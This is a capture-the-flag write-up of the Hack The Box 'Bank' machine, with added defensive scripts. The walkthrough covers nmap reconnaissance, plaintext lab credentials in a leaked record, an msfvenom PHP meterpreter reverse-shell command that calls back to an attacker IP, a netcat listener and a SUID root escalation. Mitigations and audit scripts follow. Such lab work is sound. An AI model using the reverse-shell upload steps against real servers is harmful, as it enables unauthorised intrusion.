Hack The Box - Bank Writeup


Bank is an easy difficulty Linux box. The IP address is 10.10.10.29

First Steps

The first step as with most other boxes is to run nmap on the box.

Nmap

nmap -sC -sV -oA nmap/nmap 10.10.10.29

The flags used here are:

-sC runs nmap's default scripts.

-sV does a version scan of the detected services.

-oA nmap/nmap saves the scan output in all three formats (normal, XML and grepable) in a folder named nmap.

Output

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   1024 08:ee:d0:30:d5:45:e4:59:db:4d:54:a8:dc:5c:ef:15 (DSA)
|   2048 b8:e0:15:48:2d:0d:f0:f1:73:33:b7:81:64:08:4a:91 (RSA)
|   256 a0:4c:94:d1:7b:6e:a8:fd:07:fe:11:eb:88:d5:16:65 (ECDSA)
|_  256 2d:79:44:30:c8:bb:5e:8f:07:cf:5b:72:ef:a1:6d:67 (ED25519)
53/tcp open  domain  ISC BIND 9.9.5-3ubuntu0.14 (Ubuntu Linux)
| dns-nsid:
|_  bind.version: 9.9.5-3ubuntu0.14-Ubuntu
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Port  Service
22    SSH
53    DNS
80    HTTP

DNS

Looking at the HTTP port first shows only the Apache default start page. Since the box is also running a DNS server, it is safe to assume there are virtual hosts. To reach the site by name, an entry mapping the IP address to the hostname must be added to our local hosts file.

/etc/hosts

echo "10.10.10.29 bank.htb" | sudo tee -a /etc/hosts
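The one-liner above appends blindly, and a typo in the path (the writeup's own first draft had /etc/host) fails silently. The helper below is an added example, not part of the writeup: it adds the entry only if it is not already present and then checks that the name actually resolves through the system resolver. The file path is a parameter so the helper can be exercised against a scratch copy instead of the real /etc/hosts.

```shell
#!/bin/sh
# Added example (not from the writeup): idempotent hosts-file entry plus a
# resolution check. The third argument defaults to /etc/hosts.

# Append "IP NAME" to the hosts file unless a line for NAME already exists.
# Prints "added" or "present".
add_hosts_entry() {
    ip="$1"; name="$2"; file="${3:-/etc/hosts}"
    # match: optional blanks, an address, blanks, optional other names, then NAME
    if grep -qE "^[[:space:]]*[0-9a-fA-F.:]+[[:space:]]+([^#]*[[:space:]])?$name([[:space:]]|$)" "$file"; then
        echo present
    else
        printf '%s %s\n' "$ip" "$name" >> "$file"
        echo added
    fi
}

# Resolve NAME the way the system does (hosts file first) and print the address.
# Prints nothing when the name does not resolve, e.g. after writing to the
# wrong file.
resolve_name() {
    getent hosts "$1" | awk '{ print $1; exit }'
}

# Usage on the attack machine (requires root to write /etc/hosts):
#   sudo sh -c '. ./hosts.sh; add_hosts_entry 10.10.10.29 bank.htb'
#   resolve_name bank.htb    # should print 10.10.10.29
```

If resolve_name prints nothing after the entry was "added", the write went to a file the resolver does not read, which is exactly the failure a mistyped path produces.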

HTTP

Navigating to http://bank.htb opens a login page. There is no obvious way to exploit the login form, so there must be another method of entry.

dirbuster

Running a dirbuster scan to find directories and files on the server revealed a directory named balance-transfer. Directory listing is enabled, and the folder contains several files ending in .acc which hold encrypted bank account credentials with no obvious way to decrypt them.

Sifting through the files leads to one file which is significantly smaller than the others in the directory.

http://bank.htb/balance-transfer/68576f20e9732f1b2edc4df5b8533230.acc

--ERR ENCRYPT FAILED
+=================+
| HTB Bank Report |
+=================+

===UserAccount===
Full Name: Christos Christopoulos
Email: chris@bank.htb
Password: !##HTBB4nkP4ssw0rd!##
CreditCards: 5
Transactions: 39
Balance: 8842803 .
===UserAccount===

The encryption step failed for this particular record, which leaves valid login credentials exposed in plain text.
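From the bank's side, this is a record that should have been caught before it was ever written next to the others. The script below is an added example, not part of the writeup: it audits a directory of .acc records both for the explicit failure marker shown above and for the size heuristic used to spot the file in the first place. The record layout mirrors the file above; the sample records, file names and field values are constructed placeholders.

```shell
#!/bin/sh
# Added example (not from the writeup): audit exported account records for
# ones whose encryption step failed. Sample data below is constructed.

# Print every record carrying the failure marker. Returns 0 if any was found.
find_failed_records() {
    grep -l '^--ERR ENCRYPT FAILED' "$1"/*.acc 2>/dev/null
}

# Print every record less than half the median size in the directory; a
# properly encrypted record is padded out by its ciphertext, a failed one is
# not. Returns 0 if any outlier was found.
find_size_outliers() {
    for f in "$1"/*.acc; do
        printf '%s %s\n' "$(wc -c < "$f")" "$f"
    done | sort -n | awk '
        { size[NR] = $1; name[NR] = $2 }
        END {
            if (NR == 0) exit 1
            median = size[int((NR + 1) / 2)]
            for (i = 1; i <= NR; i++)
                if (size[i] * 2 < median) { print name[i]; found = 1 }
            exit found ? 0 : 1
        }'
}

# --- constructed sample store -------------------------------------------
SAMPLE_DIR=$(mktemp -d)
trap 'rm -rf "$SAMPLE_DIR"' EXIT
# opaque blob standing in for a ciphertext field (constructed, not real data)
BLOB=0123456789abcdef0123456789abcdef0123456789abcdef0123456789abcdef

write_encrypted_record() {   # $1 = path
    cat > "$1" <<EOF
+=================+
| HTB Bank Report |
+=================+

===UserAccount===
Full Name: $BLOB
Email: $BLOB
Password: $BLOB
CreditCards: $BLOB
Transactions: $BLOB
Balance: $BLOB
===UserAccount===
EOF
}

write_failed_record() {      # $1 = path; placeholder values only
    cat > "$1" <<'EOF'
--ERR ENCRYPT FAILED
+=================+
| HTB Bank Report |
+=================+

===UserAccount===
Full Name: Placeholder Person
Email: user@example.test
Password: PLACEHOLDER-NOT-A-REAL-PASSWORD
CreditCards: 2
Transactions: 10
Balance: 1000
===UserAccount===
EOF
}

for n in 1 2 3; do write_encrypted_record "$SAMPLE_DIR/record$n.acc"; done
write_failed_record "$SAMPLE_DIR/failed.acc"

# Usage: report both detections over the sample store.
find_failed_records "$SAMPLE_DIR" | sed 's/^/FAILED:  /'
find_size_outliers "$SAMPLE_DIR"  | sed 's/^/OUTLIER: /'
```

Run against a real export directory, both checks should come back empty; anything the marker check reports is a record that must be quarantined rather than published, and anything only the size check reports deserves a manual look.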

Logging in

Using the credentials we are able to log in to the customer's bank account. The authenticated page shows typical banking transaction and account details. Only two page links exist: Support and Logout.

The support page shows a support ticket system for users to submit questions to the bank. The form supports a user file upload.

Viewing the source code of this page reveals the method of gaining entry to the system.

PHP Reverse Shell

To gain access to the system we need a PHP reverse shell. Several scripts are available for this in Kali Linux; msfvenom can also be used to produce a quick payload file if no scripts are available.

msfvenom -p php/meterpreter_reverse_tcp LHOST=10.10.14.17 LPORT=4455 -f raw > shell.htb

After uploading the file through the support page, we start a netcat listener on our attack machine with nc -nvlp 4455 to receive the connection. Once the listener is running, navigating to the uploaded file in a browser at http://bank.htb/uploads/shell.htb spawns a remote shell on the system as the www-data user.

Traversing the file system reveals that the www-data user can read the home directory of the user chris, where the user.txt file is located.

Privilege Escalation

Running LinEnum.sh on the server revealed a file with the SUID bit set.

Running this file reveals a script designed to give root privileges to the current user for "emergency" reasons.

Root

Running the emergency script immediately grants a root shell, and the root.txt file is in the root folder.

Mitigation

There are several steps that could have been taken to mitigate the security flaws on this system.

  • Account details should be moved to a location on the server that the web server cannot serve.
  • Turning off directory listings in the Apache web server would prevent the files from being browsed.
  • Ensuring that data cannot be processed or stored without valid encryption.
  • Removing debug information from customer-facing websites.
  • Not allowing users to upload files that can execute server-side code.
  • Disabling PHP's exec, passthru and shell_exec functions.
  • The Apache web server should run as its own user with no access to other system users' files or data.
  • A script that grants a root shell should never be accessible to unprivileged users.
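Three of these points (directory listings, server-side execution in the upload directory, and the PHP shell functions) can be checked directly in configuration text. The script below is an added example, not the box's own configuration: it audits an Apache virtual host file and a php.ini for those settings, with a weak and a hardened sample of each embedded for comparison. The document root /var/www/bank and the file names are assumptions; the balance-transfer and uploads paths are the ones named in the writeup.

```shell
#!/bin/sh
# Added example (not from the writeup): audit Apache/PHP config text for the
# mitigations listed above. All paths and sample configs are constructed.

# Returns 0 if any Options directive enables directory listings
# (an "Indexes" token that is not prefixed with "-"), 1 otherwise.
directory_listing_enabled() {
    grep -iE '^[[:space:]]*Options[[:space:]]' "$1" |
        grep -viE '(^|[[:space:]])-Indexes([[:space:]]|$)' |
        grep -qiE '(^|[[:space:]])\+?Indexes([[:space:]]|$)'
}

# Returns 0 if the <Directory> block for DIR turns the PHP engine off
# (php_admin_flag engine off), 1 otherwise. Usage: upload_dir_php_disabled CONF DIR
upload_dir_php_disabled() {
    awk -v dir="$2" '
        tolower($0) ~ "<directory[ \t]+\"?" dir "[\"> \t]" { inside = 1 }
        inside && tolower($0) ~ /php_admin_flag[ \t]+engine[ \t]+off/ { found = 1 }
        inside && tolower($0) ~ /<\/directory>/ { inside = 0 }
        END { exit found ? 0 : 1 }
    ' "$1"
}

# Prints each shell-spawning function that php.ini does not list in
# disable_functions; prints nothing when all are disabled.
missing_disabled_functions() {
    current=$(grep -iE '^[[:space:]]*disable_functions[[:space:]]*=' "$1" |
        tail -n 1 | cut -d= -f2- | tr -d ' "')
    for fn in exec passthru shell_exec system popen proc_open; do
        case ",$current," in
            *",$fn,"*) ;;
            *) printf '%s\n' "$fn" ;;
        esac
    done
}

# --- constructed sample configs ------------------------------------------
SAMPLE_DIR=$(mktemp -d)
trap 'rm -rf "$SAMPLE_DIR"' EXIT

cat > "$SAMPLE_DIR/weak.conf" <<'EOF'
<VirtualHost *:80>
    ServerName bank.htb
    DocumentRoot /var/www/bank
    <Directory /var/www/bank/balance-transfer>
        Options Indexes FollowSymLinks
    </Directory>
    <Directory /var/www/bank/uploads>
        Options -Indexes
    </Directory>
</VirtualHost>
EOF

cat > "$SAMPLE_DIR/hardened.conf" <<'EOF'
<VirtualHost *:80>
    ServerName bank.htb
    DocumentRoot /var/www/bank
    <Directory /var/www/bank>
        Options -Indexes +FollowSymLinks
    </Directory>
    <Directory /var/www/bank/uploads>
        Options -Indexes -ExecCGI
        php_admin_flag engine off
        RemoveHandler .php .phtml .phar
    </Directory>
</VirtualHost>
EOF

printf 'disable_functions =\n' > "$SAMPLE_DIR/weak-php.ini"
printf 'disable_functions = "exec,passthru,shell_exec,system,popen,proc_open"\n' \
    > "$SAMPLE_DIR/hardened-php.ini"

# Usage: report on one vhost file and one php.ini.
audit() {
    directory_listing_enabled "$1" && echo "WARN: directory listings enabled in $1"
    upload_dir_php_disabled "$1" /var/www/bank/uploads ||
        echo "WARN: PHP still executes under /var/www/bank/uploads in $1"
    missing_disabled_functions "$2" | sed "s|^|WARN: $2 leaves enabled: |"
}
audit "$SAMPLE_DIR/weak.conf" "$SAMPLE_DIR/weak-php.ini"
audit "$SAMPLE_DIR/hardened.conf" "$SAMPLE_DIR/hardened-php.ini"
```

Point audit at the real vhost file and php.ini and it prints nothing when all three settings are in place. Disabling the PHP engine for the upload directory is what closes the hole the writeup walks through: a file that Apache never hands to PHP cannot spawn a shell, whatever its extension.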